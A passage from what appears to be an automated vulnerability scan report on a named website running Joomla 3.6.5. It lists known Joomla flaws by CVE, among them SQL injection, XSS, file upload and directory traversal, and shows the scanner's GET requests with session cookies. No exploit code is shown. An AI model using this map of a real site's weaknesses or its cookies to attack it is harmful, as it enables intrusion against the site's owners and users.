Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/847-20210307-core-acl-violation-within-com-content-frontend-editing.html
(https://developer.joomla.org/security-centre/847-20210307-core-acl-violation-within-com-content-frontend-editing.html)
CVE-2021-26027 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26027)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
128
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.1.0 - 3.8.12)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently bypass ACLs. Joomla! Core versions 3.x.x ranging from 3.1.0 and up to and including
3.8.12 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/753-20181003-core-access-level-violation-in-com-tags.html
(https://developer.joomla.org/security-centre/753-20181003-core-access-level-violation-in-com-tags.html)
CVE-2018-17857 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17857)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
129
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.8.1)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently bypass a user's 2-factor-authentication method. Joomla! Core versions 3.x.x ranging
from 3.2.0 and up to and including 3.8.1 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/713-20171102-core-2-factor-authentication-bypass.html
(https://developer.joomla.org/security-centre/713-20171102-core-2-factor-authentication-bypass.html)
CVE-2017-16634 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16634)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
130
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and
including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/842-20210302-core-potential-insecure-fofencryptrandval.html
(https://developer.joomla.org/security-centre/842-20210302-core-potential-insecure-fofencryptrandval.html)
CVE-2021-23128 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23128)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
131
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and
including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/845-20210305-core-input-validation-within-the-template-manager.html
(https://developer.joomla.org/security-centre/845-20210305-core-input-validation-within-the-template-manager.html)
CVE-2021-23131 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23131)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
132
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and
including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/841-20210301-core-insecure-randomness-within-2fa-secret-generation.html
(https://developer.joomla.org/security-centre/841-20210301-core-insecure-randomness-within-2fa-secret-generation.html)
CVE-2021-23126 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23126)
CVE-2021-23127 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23127)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
133
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x Security Bypass (3.2.0 - 3.9.4)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently bypass ACL's. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including
3.9.4 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/778-20190402-core-helpsites-refresh-endpoint-callable-for-unauthenticated-
users.html (https://developer.joomla.org/security-centre/778-20190402-core-helpsites-refresh-endpoint-callable-for-
unauthenticated-users.html)
CVE-2019-10946 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10946)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
134
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x SQL Injection (3.0.0 - 3.9.22)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before
using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data,
or exploit latent vulnerabilities in the underlying database. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.22 are vulnerable.
Impact
Recommendation
References
https://www.empressia.pl/blog/184-analiza-podatnosci-sql-injection-w-cms-joomla (https://www.empressia.pl/blog/184-
analiza-podatnosci-sql-injection-w-cms-joomla)
https://github.com/HoangKien1020/Joomla-SQLinjection (https://github.com/HoangKien1020/Joomla-SQLinjection)
https://developer.joomla.org/security-centre/831-20201104-core-sql-injection-in-com-users-list-view.html
(https://developer.joomla.org/security-centre/831-20201104-core-sql-injection-in-com-users-list-view.html)
CVE-2020-35613 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35613)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
135
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core 3.x.x SQL Injection (3.5.0 - 3.8.5)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before
using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data,
or exploit latent vulnerabilities in the underlying database. Joomla! Core versions 3.x.x ranging from 3.5.0 and up to and
including 3.8.5 are vulnerable.
Impact
Recommendation
References
http://blog.nsfocus.net/cve-2018-804-analysis/ (http://blog.nsfocus.net/cve-2018-804-analysis/)
https://paper.seebug.org/553/ (https://paper.seebug.org/553/)
https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html
(https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html)
CVE-2018-8045 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8045)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
136
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Arbitrary File Upload (2.5.0 - 3.8.7)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly
verify user-supplied input. Depending on the server configuration, an attacker can exploit this vulnerability to upload
arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege
escalation; other attacks are also possible. Joomla! Core versions ranging from 2.5.0 and up to and including 3.8.7 are
vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/730-20180502-core-add-phar-files-to-the-upload-blacklist.html
(https://developer.joomla.org/security-centre/730-20180502-core-add-phar-files-to-the-upload-blacklist.html)
CVE-2018-11322 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11322)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
137
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Cross-Site Scripting (1.0.0 - 3.9.2)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.0.0 and up to and including 3.9.2 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/766-20190202-core-browserside-mime-type-sniffing-causes-xss-attack-
vectors.html (https://developer.joomla.org/security-centre/766-20190202-core-browserside-mime-type-sniffing-causes-xss-
attack-vectors.html)
CVE-2019-7742 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7742)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
138
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Cross-Site Scripting (1.5.0 - 3.7.3)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.5.0 and up to and including 3.7.3 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/701-20170704-core-installer-lack-of-ownership-verification
(https://developer.joomla.org/security-centre/701-20170704-core-installer-lack-of-ownership-verification)
CVE-2017-11612 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11612)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
139
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Cross-Site Scripting (1.5.0 - 3.8.3)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.5.0 and up to and including 3.8.3 are vulnerable.
Impact
Recommendation
References
https://lorexxar.cn/2018/02/07/joomla3-8-4/ (https://lorexxar.cn/2018/02/07/joomla3-8-4/)
https://developer.joomla.org/security-centre/721-20180104-core-xss-vulnerability.html
(https://developer.joomla.org/security-centre/721-20180104-core-xss-vulnerability.html)
CVE-2018-6379 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6379)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
140
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Cross-Site Scripting (1.6.0 - 3.8.8)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.6.0 and up to and including 3.8.8 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/740-20180602-core-xss-vulnerability-in-language-switcher-module
(https://developer.joomla.org/security-centre/740-20180602-core-xss-vulnerability-in-language-switcher-module)
CVE-2018-12711 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12711)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
141
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Cross-Site Scripting (1.7.0 - 3.9.5)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.7.0 and up to and including 3.9.5 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/780-20190501-core-xss-in-com-users-acl-debug-view.html
(https://developer.joomla.org/security-centre/780-20190501-core-xss-in-com-users-acl-debug-view.html)
CVE-2019-11809 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11809)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
142
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Cross-Site Scripting (2.5.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 2.5.0 and up to and including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/843-20210303-core-xss-within-alert-messages-showed-to-users.html
(https://developer.joomla.org/security-centre/843-20210303-core-xss-within-alert-messages-showed-to-users.html)
CVE-2021-23129 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23129)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
143
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Cross-Site Scripting (2.5.0 - 3.9.24)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 2.5.0 and up to and including 3.9.24 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/844-20210304-core-xss-within-the-feed-parser-library.html
(https://developer.joomla.org/security-centre/844-20210304-core-xss-within-the-feed-parser-library.html)
CVE-2021-23130 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23130)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
144
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Denial of Service (2.5.0 - 3.9.27)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a Denial of Service vulnerability. Exploiting this issue may allow an attacker to cause a broken
usergroups table, thus denying service to legitimate users. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.27 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/857-20210702-core-dos-through-usergroup-table-manipulation.html
(https://developer.joomla.org/security-centre/857-20210702-core-dos-through-usergroup-table-manipulation.html)
CVE-2021-26036 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26036)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
145
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Directory Traversal (1.5.0 - 3.9.4)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions ranging from 1.5.0 and up to and including 3.9.4 are vulnerable.
Impact
Recommendation
References
https://www.exploit-db.com/exploits/46710 (https://www.exploit-db.com/exploits/46710)
https://packetstormsecurity.com/files/152515/Joomla-3.9.4-Arbitrary-File-Deletion-Directory-Traversal.html
(https://packetstormsecurity.com/files/152515/Joomla-3.9.4-Arbitrary-File-Deletion-Directory-Traversal.html)
https://developer.joomla.org/security-centre/777-20190401-core-directory-traversal-in-com-media.html
(https://developer.joomla.org/security-centre/777-20190401-core-directory-traversal-in-com-media.html)
CVE-2019-10945 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
146
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Directory Traversal (2.5.0 - 3.9.20)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.9.20 are vulnerable.
Impact
Recommendation
References
https://github.com/HoangKien1020/CVE-2020-24597 (https://github.com/HoangKien1020/CVE-2020-24597)
https://developer.joomla.org/security-centre/827-20200803-core-directory-traversal-in-com-media.html
(https://developer.joomla.org/security-centre/827-20200803-core-directory-traversal-in-com-media.html)
CVE-2020-24597 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24597)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
147
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Directory Traversal (2.5.0 - 3.9.22)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.9.22 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/830-20201103-core-path-traversal-in-mod-random-image.html
(https://developer.joomla.org/security-centre/830-20201103-core-path-traversal-in-mod-random-image.html)
CVE-2020-35612 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35612)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
148
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Information Disclosure (1.5.0 - 3.7.5)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 1.5.0 and up to and including
3.7.5 are vulnerable.
Impact
Recommendation
References
https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
(https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/)
https://developer.joomla.org/security-centre/711-20170902-core-ldap-information-disclosure
(https://developer.joomla.org/security-centre/711-20170902-core-ldap-information-disclosure)
CVE-2017-14596 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14596)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
149
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Information Disclosure (1.5.0 - 3.8.1)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 1.5.0 and up to and including
3.8.1 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/714-20171101-core-ldap-information-disclosure.html
(https://developer.joomla.org/security-centre/714-20171101-core-ldap-information-disclosure.html)
CVE-2017-14596 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14596)
Affected items
Web Server
Details
Current Joomla! version: 3.6.5.
150
GET / HTTP/1.1
Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: www.sogbci.com
Connection: Keep-alive
Joomla! Core Information Disclosure (2.5.0 - 3.9.22)
Severity High
Reported by module /Scripts/WebApps/joomla_8.script
Description
Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 2.5.0 and up to and including
3.9.22 are vulnerable.
Impact
Recommendation
References
https://developer.joomla.org/security-centre/829-20201102-core-disclosure-of-secrets-in-global-configuration-page.html
(https://developer.joomla.org/security-centre/829-20201102-core-disclosure-of-secrets-in-global-configuration-page.html)
